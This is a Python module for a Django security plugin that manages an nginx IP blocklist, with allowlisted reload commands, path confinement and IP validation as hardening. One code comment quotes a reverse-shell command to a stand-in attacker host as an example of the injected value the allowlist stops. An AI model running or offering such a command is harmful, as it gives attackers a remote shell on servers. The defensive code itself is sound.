import subprocess
from pathlib import Path

from django.conf import settings

from apps.web_security.models import FirewallConfig
from apps.web_security.utils import validate_ip

from .base import BaseFirewallService, logger

# Allowlisted nginx reload commands. The reload command comes from a FirewallConfig
# credential; without an allowlist a stored value such as "nc attacker 4444 -e /bin/sh"
# would be executed as a shell-free subprocess (remote code execution). Only these exact
# argument vectors may run.
ALLOWED_NGINX_RELOAD_COMMANDS = {
    ("nginx", "-s", "reload"),
    ("nginx", "-t"),
    ("systemctl", "reload", "nginx"),
    ("service", "nginx", "reload"),
}

# nginx blocklist files may only be written inside this directory tree, so an
# attacker-controlled config_path cannot overwrite arbitrary files. Override with
# WEB_SECURITY_NGINX_CONFIG_DIR.
DEFAULT_NGINX_CONFIG_DIR = "/etc/nginx"


class NginxFirewallService(BaseFirewallService):
    """Nginx firewall integration service."""

    def __init__(self, config: FirewallConfig):
        super().__init__(config)
        self.config_path = self.credentials.get("config_path", "/etc/nginx/conf.d/blocklist.conf")
        self.reload_command = self.credentials.get("reload_command", "nginx -s reload")

    def _allowed_config_path(self):
        """
        Return the resolved config path if it is inside the allowed nginx directory,
        else None. Prevents an attacker-set config_path from reading/overwriting
        arbitrary files.
        """
        base = Path(getattr(settings, "WEB_SECURITY_NGINX_CONFIG_DIR", DEFAULT_NGINX_CONFIG_DIR)).resolve()
        try:
            target = Path(self.config_path).resolve()
            target.relative_to(base)  # raises ValueError if target escapes base
        except (ValueError, OSError):
            logger.error("Refusing nginx blocklist path outside %s: %r", base, self.config_path)
            return None
        return target

    def _read_blocked_ips(self) -> set:
        """Read blocked IPs from nginx config file."""
        path = self._allowed_config_path()
        if path is None:
            return set()
        try:
            with open(path) as f:
                content = f.read()
            # Parse deny directives
            ips = set()
            for line in content.split("\n"):
                line = line.strip()
                if line.startswith("deny ") and line.endswith(";"):
                    ip = line[5:-1].strip()
                    ips.add(ip)
            return ips
        except FileNotFoundError:
            return set()
        except Exception as e:
            logger.error(f"Error reading nginx blocklist: {e}")
            return set()

    def _write_blocked_ips(self, ips: set) -> bool:
        """
        Write validated blocked IPs to the (allowlisted) nginx config file, atomically.

        Every IP is re-validated here so a malformed or injected value (e.g. one
        containing a newline) can never be written as an nginx directive.
        """
        path = self._allowed_config_path()
        if path is None:
            return False
        try:
            content = "# Auto-generated by web_security plugin\n"
            content += "# Do not edit manually\n\n"
            for ip in sorted(ips):
                valid = validate_ip(ip)
                if valid is None:
                    logger.warning("Skipping invalid IP in nginx blocklist: %r", ip)
                    continue
                content += f"deny {valid};\n"

            tmp = path.with_suffix(path.suffix + ".tmp")
            tmp.write_text(content)
            tmp.replace(path)  # atomic rename within the same directory
            return True
        except Exception as e:
            logger.error(f"Error writing nginx blocklist: {e}")
            return False

    def _reload_nginx(self) -> bool:
        """Reload nginx to apply changes (only an allowlisted reload command may run)."""
        command = tuple(self.reload_command.split())
        if command not in ALLOWED_NGINX_RELOAD_COMMANDS:
            logger.error("Refusing to run non-allowlisted nginx reload command: %r", self.reload_command)
            return False
        try:
            result = subprocess.run(
                list(command),
                capture_output=True,
                text=True,
                timeout=30,
            )
            if result.returncode == 0:
                logger.info("Nginx reloaded successfully")
                return True
            logger.error(f"Nginx reload failed: {result.stderr}")
            return False
        except Exception as e:
            logger.error(f"Error reloading nginx: {e}")
            return False

    def block_ip(self, ip_address: str, reason: str = "") -> bool:
        """Add IP to nginx blocklist."""
        valid_ip = validate_ip(ip_address)
        if valid_ip is None:
            logger.error("Refusing to block invalid IP on Nginx: %r", ip_address)
            return False
        ips = self._read_blocked_ips()
        if valid_ip in ips:
            return True  # Already blocked

        ips.add(valid_ip)
        if self._write_blocked_ips(ips):
            logger.info(f"Blocked IP {valid_ip} on Nginx")
            return self._reload_nginx()
        return False

    def unblock_ip(self, ip_address: str) -> bool:
        """Remove IP from nginx blocklist."""
        valid_ip = validate_ip(ip_address)
        if valid_ip is None:
            logger.error("Refusing to unblock invalid IP on Nginx: %r", ip_address)
            return False
        ips = self._read_blocked_ips()
        if valid_ip not in ips:
            return True  # Already not blocked

        ips.discard(valid_ip)
        if self._write_blocked_ips(ips):
            logger.info(f"Unblocked IP {valid_ip} on Nginx")
            return self._reload_nginx()
        return False

    def get_blocked_ips(self) -> list:
        """Get blocked IPs from nginx config."""
        return list(self._read_blocked_ips())

    def sync_blocks(self, ip_addresses: list) -> dict:
        """Sync blocked IPs to nginx config."""
        results = {"added": 0, "failed": 0, "already_blocked": 0}
        existing = self._read_blocked_ips()

        new_ips = set(existing)
        for ip in ip_addresses:
            valid_ip = validate_ip(ip)
            if valid_ip is None:
                logger.warning("Skipping invalid IP in nginx sync: %r", ip)
                results["failed"] += 1
                continue
            if valid_ip in existing:
                results["already_blocked"] += 1
            else:
                new_ips.add(valid_ip)
                results["added"] += 1

        if results["added"] > 0:
            if self._write_blocked_ips(new_ips) and self._reload_nginx():
                pass  # Success
            else:
                results["failed"] = results["added"]
                results["added"] = 0

        return results
